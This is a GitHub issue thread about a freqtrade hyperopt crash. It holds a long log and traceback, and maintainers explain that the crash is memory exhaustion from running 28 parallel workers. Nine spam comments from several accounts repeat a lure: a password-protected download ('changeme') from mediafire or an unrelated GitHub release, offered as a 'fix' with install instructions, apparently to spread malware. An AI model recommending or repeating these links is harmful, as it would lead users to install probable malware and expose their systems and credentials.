### ISSUE TITLE
Fatal exception when optimizing with Hyperopt.I have 28 threads on my CPU and 128 gigs of RAM.

### ISSUE THREAD

**Issue by chon-1** [freqtrade/freqtrade#10590]
2024-08-28 09:24:11,524 - freqtrade - INFO - freqtrade 2024.7.1
2024-08-28 09:24:11,526 - freqtrade.configuration.load_config - INFO - Using config: config.json ...
2024-08-28 09:24:11,527 - freqtrade.loggers - INFO - Verbosity set to 0
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Using max_open_trades: 10 ...
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Using user-data directory: /home/monk/1/freqtrade/user_data ...
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Using data directory: /home/monk/1/freqtrade/user_data/data/okx ...
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Parameter --epochs detected ... Will run Hyperopt with for 1000 epochs ...
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Parameter -s/--spaces detected: default
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Parameter -j/--job-workers detected: -1
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Parameter --min-trades detected: 1
2024-08-28 09:24:11,527 - freqtrade.configuration.configuration - INFO - Using Hyperopt loss class name: SharpeHyperOptLoss
2024-08-28 09:24:11,527 - freqtrade.exchange.check_exchange - INFO - Checking exchange...
2024-08-28 09:24:11,530 - freqtrade.exchange.check_exchange - INFO - Exchange "okx" is officially supported by the Freqtrade development team.
2024-08-28 09:24:11,530 - freqtrade.configuration.configuration - INFO - Using pairlist from configuration.
2024-08-28 09:24:11,530 - freqtrade.configuration.config_validation - INFO - Validating configuration ...
2024-08-28 09:24:11,531 - freqtrade.commands.optimize_commands - INFO - Starting freqtrade in Hyperopt mode
2024-08-28 09:24:11,532 - freqtrade.exchange.exchange - INFO - Instance is running with dry_run enabled
2024-08-28 09:24:11,532 - freqtrade.exchange.exchange - INFO - Using CCXT 4.3.85
2024-08-28 09:24:11,532 - freqtrade.exchange.exchange - INFO - Applying additional ccxt config: {'options': {'defaultType': 'swap'}}
2024-08-28 09:24:11,534 - freqtrade.exchange.exchange - INFO - Applying additional ccxt config: {'options': {'defaultType': 'swap'}}
2024-08-28 09:24:11,537 - freqtrade.exchange.exchange - INFO - Using Exchange "OKX"
2024-08-28 09:24:13,597 - freqtrade.exchange.exchange - INFO - Using cached leverage_tiers.
2024-08-28 09:24:13,597 - freqtrade.exchange.exchange - INFO - Done initializing 192 markets.
2024-08-28 09:24:13,604 - freqtrade.resolvers.exchange_resolver - INFO - Using resolved exchange 'Okx'...
2024-08-28 09:24:13,635 - freqtrade.resolvers.iresolver - INFO - Using resolved strategy NewRsiquiV3 from '/home/monk/1/freqtrade/user_data/strategies/NewRsiquiV3 .py'...
2024-08-28 09:24:13,635 - freqtrade.strategy.hyper - INFO - Found no parameter file.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'order_types' with value in config file: {'entry': 'limit', 'exit': 'limit', 'stoploss': 'market', 'stoploss_on_exchange': False, 'emergency_exit': 'market'}.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'order_time_in_force' with value in config file: {'entry': 'gtc', 'exit': 'gtc'}.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'stake_currency' with value in config file: USDT.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'stake_amount' with value in config file: unlimited.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'unfilledtimeout' with value in config file: {'entry': 10, 'exit': 60, 'exit_timeout_count': 0, 'unit': 'seconds'}.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Override strategy 'max_open_trades' with value in config file: 10.
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using minimal_roi: {'60': 0.02, '30': 0.015, '10': 0.01, '0': 0.005}
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using timeframe: 5m
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using stoploss: -0.05
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using trailing_stop: True
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using trailing_stop_positive: 0.0005
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using trailing_stop_positive_offset: 0.01
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using trailing_only_offset_is_reached: True
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using use_custom_stoploss: False
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using process_only_new_candles: True
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using order_types: {'entry': 'limit', 'exit': 'limit', 'stoploss': 'market', 'stoploss_on_exchange': False, 'emergency_exit': 'market'}
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using order_time_in_force: {'entry': 'gtc', 'exit': 'gtc'}
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using stake_currency: USDT
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using stake_amount: unlimited
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using protections: []
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using startup_candle_count: 200
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using unfilledtimeout: {'entry': 10, 'exit': 60, 'exit_timeout_count': 0, 'unit': 'seconds'}
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using use_exit_signal: True
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using exit_profit_only: False
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using ignore_roi_if_entry_signal: False
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using exit_profit_offset: 0.0
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using disable_dataframe_checks: False
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using ignore_buying_expired_candle_after: 0
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using position_adjustment_enable: False
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using max_entry_position_adjustment: -1
2024-08-28 09:24:13,636 - freqtrade.resolvers.strategy_resolver - INFO - Strategy using max_open_trades: 10
2024-08-28 09:24:13,636 - freqtrade.configuration.config_validation - INFO - Validating configuration ...
2024-08-28 09:24:13,639 - freqtrade.resolvers.iresolver - INFO - Using resolved pairlist StaticPairList from '/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/plugins/pairlist/StaticPairList.py'...
2024-08-28 09:24:13,642 - freqtrade.optimize.backtesting - INFO - Using fee 0.0500% - worst case fee from exchange (lowest tier).
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - No params for buy found, using default values.
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - Strategy Parameter(default): rsi_entry_long = 50
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - Strategy Parameter(default): rsi_entry_short = 50
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - No params for sell found, using default values.
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - Strategy Parameter(default): rsi_exit_long = 95
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - Strategy Parameter(default): rsi_exit_short = 43
2024-08-28 09:24:13,643 - freqtrade.strategy.hyper - INFO - No params for protection found, using default values.
2024-08-28 09:24:13,644 - freqtrade.resolvers.iresolver - INFO - Using resolved hyperoptloss SharpeHyperOptLoss from '/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/optimize/hyperopt_loss/hyperopt_loss_sharpe.py'...
2024-08-28 09:24:13,644 - freqtrade.optimize.hyperopt - INFO - Removing `/home/monk/1/freqtrade/user_data/hyperopt_results/hyperopt_tickerdata.pkl`.
2024-08-28 09:24:13,647 - freqtrade.optimize.hyperopt - INFO - Using optimizer random state: 62057
2024-08-28 09:24:13,648 - freqtrade.optimize.hyperopt_interface - INFO - Min roi table: {0: 0.03, 10: 0.02, 20: 0.01, 30: 0}
2024-08-28 09:24:13,648 - freqtrade.optimize.hyperopt_interface - INFO - Max roi table: {0: 0.31, 40: 0.11, 100: 0.04, 220: 0}
2024-08-28 09:24:13,649 - freqtrade.data.history.history_utils - INFO - Using indicator startup period: 200 ...
2024-08-28 09:24:13,795 - freqtrade.optimize.backtesting - INFO - Loading data from 2024-03-01 00:00:00 up to 2024-08-27 23:15:00 (179 days).
2024-08-28 09:24:13,795 - freqtrade.configuration.timerange - WARNING - Moving start-date by 200 candles to account for startup time.
2024-08-28 09:24:13,798 - freqtrade.data.history.datahandlers.idatahandler - WARNING - LTC/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,803 - freqtrade.data.history.datahandlers.idatahandler - WARNING - ETH/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,808 - freqtrade.data.history.datahandlers.idatahandler - WARNING - BTC/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,813 - freqtrade.data.history.datahandlers.idatahandler - WARNING - XRP/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,818 - freqtrade.data.history.datahandlers.idatahandler - WARNING - SOL/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,823 - freqtrade.data.history.datahandlers.idatahandler - WARNING - MATIC/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,828 - freqtrade.data.history.datahandlers.idatahandler - WARNING - DOGE/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,833 - freqtrade.data.history.datahandlers.idatahandler - WARNING - PEPE/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,838 - freqtrade.data.history.datahandlers.idatahandler - WARNING - ORDI/USDT:USDT, funding_rate, 8h, data starts at 2024-05-22 16:00:00
2024-08-28 09:24:13,893 - freqtrade.optimize.hyperopt - INFO - Dataload complete. Calculating indicators
2024-08-28 09:24:13,971 - freqtrade.optimize.hyperopt - INFO - Hyperopting with data from 2024-03-01 16:40:00 up to 2024-08-27 23:15:00 (179 days)..
2024-08-28 09:24:14,001 - freqtrade.optimize.hyperopt - INFO - Found 28 CPU cores. Let's make them scream!
2024-08-28 09:24:14,001 - freqtrade.optimize.hyperopt - INFO - Number of parallel jobs set as: -1
2024-08-28 09:24:14,001 - freqtrade.optimize.hyperopt - INFO - Using estimator ET.
2024-08-28 09:24:14,008 - freqtrade.optimize.hyperopt - INFO - Effective number of parallel workers used: 28
                                                                          Hyperopt results
       ┏━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┓
       ┃ Best   ┃    Epoch ┃ Trades ┃   Win  Draw  Loss  Win% ┃ Avg profit ┃                    Profit ┃ Avg duration ┃  Objective ┃    Max Drawdown (Acct) ┃
       ┡━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━┩
       │ * Best │   1/1000 │   2860 │  1881   437   542  65.8 │      0.18% │    57.086 USDT   (57.09%) │      4:16:00 │  -26.22724 │ 14.631 USDT    (9.18%) │
       │ * Best │   6/1000 │   5228 │  3930   450   848  75.2 │      0.30% │   268.357 USDT  (268.36%) │      1:33:00 │ -123.95429 │  9.097 USDT    (2.52%) │
       │ * Best │  14/1000 │   8084 │  4756  2358   970  58.8 │      0.21% │   319.136 USDT  (319.14%) │      1:46:00 │ -132.64583 │ 19.735 USDT    (4.74%) │
       │ Best   │  32/1000 │   7419 │  5305   868  1246  71.5 │      0.26% │   401.033 USDT  (401.03%) │      1:20:00 │ -172.29844 │ 14.801 USDT    (3.36%) │
       │ Best   │  36/1000 │  12890 │  9578  1264  2048  74.3 │      0.25% │ 1591.883 USDT (1,591.88%) │      1:00:00 │ -301.61522 │ 42.713 USDT    (3.34%) │
       │ Best   │  58/1000 │  13521 │ 10714   313  2494  79.2 │      0.27% │ 2435.326 USDT (2,435.33%) │      1:04:00 │ -305.53227 │ 80.269 USDT    (3.36%) │
       │ Best   │  62/1000 │  13584 │ 10552   654  2378  77.7 │      0.27% │ 2339.621 USDT (2,339.62%) │      1:03:00 │ -306.64093 │ 72.345 USDT    (3.16%) │
       │ Best   │  70/1000 │  13534 │ 10688   381  2465  79.0 │      0.28% │ 2585.576 USDT (2,585.58%) │      1:04:00 │ -313.44271 │ 76.747 USDT    (3.04%) │
       │ Best   │  77/1000 │  14767 │ 11115   725  2927  75.3 │      0.26% │ 2744.852 USDT (2,744.85%) │      1:06:00 │ -316.18878 │ 48.111 USDT    (2.38%) │
       │ Best   │  91/1000 │  13718 │ 10728   528  2462  78.2 │      0.27% │ 2529.901 USDT (2,529.90%) │      0:59:00 │ -332.45865 │ 63.172 USDT    (3.35%) │
       │ Best   │ 105/1000 │  13776 │ 10962   144  2670  79.6 │      0.27% │ 2589.683 USDT (2,589.68%) │      0:57:00 │ -334.18690 │ 72.250 USDT    (3.71%) │
       │ Best   │ 108/1000 │  13830 │ 11019    89  2722  79.7 │      0.27% │ 2710.253 USDT (2,710.25%) │      0:56:00 │ -345.78122 │ 64.427 USDT    (3.19%) │
       └────────┴──────────┴────────┴─────────────────────────┴────────────┴───────────────────────────┴──────────────┴────────────┴────────────────────────┘
Epochs ━━━━━━━━━━━━━━━━━━━━╸━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━  168/1000  17% • 0:12:11 • 0:01:12
2024-08-28 09:36:25,565 - freqtrade - ERROR - Fatal exception!
Traceback (most recent call last):
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/main.py", line 43, in main
    return_code = args["func"](args)
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/commands/optimize_commands.py", line 109, in start_hyperopt
    hyperopt.start()
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/optimize/hyperopt.py", line 655, in start
    f_val = self.run_optimizer_parallel(parallel, asked)
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/freqtrade/optimize/hyperopt.py", line 478, in run_optimizer_parallel
    return parallel(
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 2007, in __call__
    return output if self.return_generator else list(output)
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 1650, in _get_outputs
    yield from self._retrieve()
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 1754, in _retrieve
    self._raise_error_fast()
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 1789, in _raise_error_fast
    error_job.get_result(self.timeout)
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 745, in get_result
    return self._return_or_raise()
  File "/home/monk/1/new_freqtrade_env/lib/python3.10/site-packages/joblib/parallel.py", line 763, in _return_or_raise
    raise self._result
joblib.externals.loky.process_executor.TerminatedWorkerError: A worker process managed by the executor was unexpectedly terminated. This could be caused by a segmentation fault while calling the function or by an excessive memory usage causing the Operating System to kill the worker.

The exit codes of the workers are {SIGSEGV(-11)}

**Comment by stash86** [comment]
128GB of RAM is nothing if you are using 28 jobs for hyperopt. Start from 1, and increase gradually to see the limit of your usage.

Reading material
https://botacademy.ddns.net/2023/07/09/how-to-reduce-memory-usage-on-backtest-hyperopt/

**Comment by xmatthias** [comment]
It's a quite simple out of memory error. Memory multiplies per process - so without limitation, each worker will get 128 / 28  - or roughly 4.5Gb of Ram (most likely a little less, as the main process requires a bit more RAM).

The documentation has an extra [section about out of memory errors](https://www.freqtrade.io/en/latest/hyperopt/#out-of-memory-errors) - as they happen quite frequently - and solutions to it are quite simple.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chon-1** [comment]
Thanks, I didn't read the docs carefully, my configuration can run 15 threads for hyperopt stably

**Comment by stash86** [comment]
I would suggest you to increase the timerange and reduce the job count. You will always benefit from more data more than to how fast the hyperopt completed

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
